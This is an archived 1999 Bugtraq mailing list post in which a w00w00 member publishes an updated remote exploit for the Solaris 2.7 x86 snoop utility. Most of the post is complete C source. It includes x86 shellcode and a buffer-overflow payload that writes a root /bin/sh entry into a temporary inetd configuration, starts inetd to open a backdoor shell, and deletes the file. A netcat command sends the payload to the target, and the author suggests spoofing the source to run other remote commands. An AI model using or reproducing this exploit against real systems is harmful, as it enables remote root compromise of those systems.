Bugtraq mailing list archives
Re: w00giving #8] Solaris 2.7's snoop
From: ktwo () ITSEC NET (Shane A. Macaulay)
Date: Thu, 9 Dec 1999 11:56:47 +0000
w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwo () ktwo ca) Hi, Here's a new version of my snoop exploit, it seems that it will work on the new patched version of snoop aswell, and actually, the target host dose NOT have to be running with -v. Some interesting applications would be to spoof the source and have it issue a remote command other then loading a portshell. K2 w00w00 /* by: K2, version .2 this is a funny Solaris. remote Solaris 2.7 x86 snoop exploit rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop" verified with patch 108483-01 thx str/horizon for shellcodes. Hi plageuz Hi mom. */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock" "stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;" "/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 const char x86_nop=0x90; long nop=NOPDEF,esp=0x804646c; long offset=DEFOFF; char buffer[SIZE]; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) { *((int *) &buffer[i]) = esp+offset; } fprintf(stderr,"0x%x\n",esp+offset); printf("%s", buffer); return 0; }
Current thread:
- Re: Analysis of Tribe Flood Network, (continued)
- Re: Analysis of Tribe Flood Network Mixter (Dec 08)
- Re: Analysis of Tribe Flood Network Stefan Laudat (Dec 10)
- Error in System Policies Adam Simms (Dec 10)
- Re: Analysis of Tribe Flood Network Mixter (Dec 11)
- Big problem on linux 2.0 visi0n (Dec 11)
- Re: Big problem on linux 2.0 visi0n (Dec 11)
- Re: Big problem on linux 2.0 Andrea Arcangeli (Dec 14)
- HP-UX: Security Vulnerability in wu-ftp Aleph One (Dec 13)
- Re: w00giving #8] Solaris 2.7's snoop Shane A. Macaulay (Dec 09)
- Clarification needed on the snoop vuln(s) Alfred Huger (Dec 09)
- Re: FTP denial of service attack Renaud Deraison (Dec 07)
- FTP DoS - PORT and PASV effected. Darren Reed (Dec 07)
- Re: FTP DoS - PORT and PASV effected. Henrik Nordstrom (Dec 09)
- Re: FTP denial of service attack Hugo.van.der.Kooij () CAIW NL (Dec 08)
- Re: FTP denial of service attack Paulo Licio de Geus (Dec 09)
- [Debian] New version of htdig released Aleph One (Dec 10)